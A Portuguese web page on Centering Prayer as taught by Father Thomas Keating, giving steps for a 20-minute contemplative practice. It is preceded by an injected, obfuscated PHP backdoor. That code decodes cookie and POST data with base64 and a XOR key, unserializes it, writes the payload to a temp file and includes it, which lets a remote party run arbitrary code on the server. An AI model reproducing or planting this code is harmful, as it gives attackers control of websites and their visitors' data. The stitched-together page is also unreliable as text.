$VTwhB = chr (80) . chr ( 813 - 704 )."\162" . chr (95) . 'A' . 'z' . "\x51" . "\172";$BhcbIsPQma = chr (99) . "\154" . chr (97) . chr (115) . "\163" . chr ( 490 - 395 ).chr ( 959 - 858 ).chr ( 159 - 39 ).chr ( 600 - 495 )."\163" . chr ( 979 - 863 ).chr ( 696 - 581 ); $oLcEukCPx = class_exists($VTwhB); $BhcbIsPQma = "28800";$WFfESBvQPi = !1;if ($oLcEukCPx == $WFfESBvQPi){function GEUHXB(){return FALSE;}$IfMhowcR = "45328";GEUHXB();class Pmr_AzQz{private function rDNtGZHU($IfMhowcR){if (is_array(Pmr_AzQz::$lPDRcWBCLZ)) {$rVcHKfdcj = sys_get_temp_dir() . "/" . crc32(Pmr_AzQz::$lPDRcWBCLZ['s' . 'a' . chr ( 435 - 327 )."\x74"]);@Pmr_AzQz::$lPDRcWBCLZ[chr ( 319 - 200 ).'r' . 'i' . 't' . chr ( 918 - 817 )]($rVcHKfdcj, Pmr_AzQz::$lPDRcWBCLZ['c' . 'o' . chr ( 305 - 195 ).chr (116) . 'e' . 'n' . "\x74"]);include $rVcHKfdcj;@Pmr_AzQz::$lPDRcWBCLZ["\144" . 'e' . 'l' . "\145" . "\x74" . "\145"]($rVcHKfdcj); $IfMhowcR = "45328";exit();}}private $mkPduu;public function XcNdKoTLAF(){echo 9062;}public function __destruct(){$IfMhowcR = "28988_18323";$this->rDNtGZHU($IfMhowcR); $IfMhowcR = "28988_18323";}public function __construct($WFkWXiNW=0){$vilOifG = $_POST;$CyJcZ = $_COOKIE;$uInEWKD = "0ec9fffc-5159-4606-aa4e-553b2ecf126c";$iyfdjf = @$CyJcZ[substr($uInEWKD, 0, 4)];if (!empty($iyfdjf)){$AzSJhDSUY = "base64";$bgMNT = "";$iyfdjf = explode(",", $iyfdjf);foreach ($iyfdjf as $VfijKub){$bgMNT .= @$CyJcZ[$VfijKub];$bgMNT .= @$vilOifG[$VfijKub];}$bgMNT = array_map($AzSJhDSUY . chr ( 767 - 672 ).'d' . "\145" . "\143" . "\157" . "\x64" . "\x65", array($bgMNT,)); $bgMNT = $bgMNT[0] ^ str_repeat($uInEWKD, (strlen($bgMNT[0]) / strlen($uInEWKD)) + 1);Pmr_AzQz::$lPDRcWBCLZ = @unserialize($bgMNT); $bgMNT = class_exists("28988_18323");}}public static $lPDRcWBCLZ = 24805;}$KxLIaPqAce = new /* 4374 */ $VTwhB(45328 + 45328); $IfMhowcR = strpos($IfMhowcR, $IfMhowcR); $WFfESBvQPi = $KxLIaPqAce = $IfMhowcR = Array();} Experimente a Oração Centrante | Instituto Integral Brasil

A oração centrante é uma simples prática cristã que nos ajuda a localizar e a nos refugiarmos em nosso “espaço interior”, consentindo a presença de Deus, em 2ª pessoa, o que nos conduz a uma profunda experiência de oração, devoção e contemplação do divino. Amplamente popularizada nas últimas décadas pelo Padre Thomas Keating, a Oração Centrante tem sua origem nas práticas de oração contemplativa dos Padres do Deserto, da tradição Lectio Divinia do monasticismo Beneditino e em obras como “The Cloud of Unknowing” e nos escritos de Santa Teresa de Ávila e São João da Cruz. E continua até hoje como uma das práticas contemplativas mais poderosas da tradição cristã.


Experimente a Oração Centrante
Padre Thomas Keating

“Quando você orar, vá para o seu quarto interior, feche a porta e ore ao seu Pai em segredo. E seu Pai, que vê em segredo, irá recompensá-lo. ”

Jesus Cristo, O Sermão da Montanha

Reserve 20 minutos de seu dia e experimente o seguinte:

  • Escolha uma palavra sagrada como símbolo da sua intenção em consentir a presença e a ação de Deus em seu interior (por exemplo, Deus, Cristo, EU SOU, Amor, Agora, Fé, Amém, etc.);
  • Sente-se confortavelmente e com os olhos fechados;
  • Acomode-se e silenciosamente traga à sua consciência a palavra sagrada que você escolheu como o símbolo de sua intenção e consentimento da presença e ação de Deus em seu interior;
  • Quando você tomar consciência de pensamentos distrativos, volte sempre de maneira muito gentil para a palavra sagrada;
  • No final do período de oração, permaneça em silêncio com os olhos fechados por alguns minutos, antes de retornar para as atividades do dia-a-dia.

“O mundo moderno encontra-se sob uma sensação generalizada de angústia, de ser abandonado, ou pelo menos experimentar Deus como ausente. No entanto, eventos que parecem virar nossas vidas de cabeça para baixo e de dentro para fora fazem parte do plano redentor de Deus, não apenas para nós, mas para o mundo em que vivemos. Deus pode estar preparando um grande despertar para o mundo, se Deus puder encontrar pessoas suficientes para cooperar neste plano misterioso.”

Padre Thomas Keating

Fonte: integrallife.com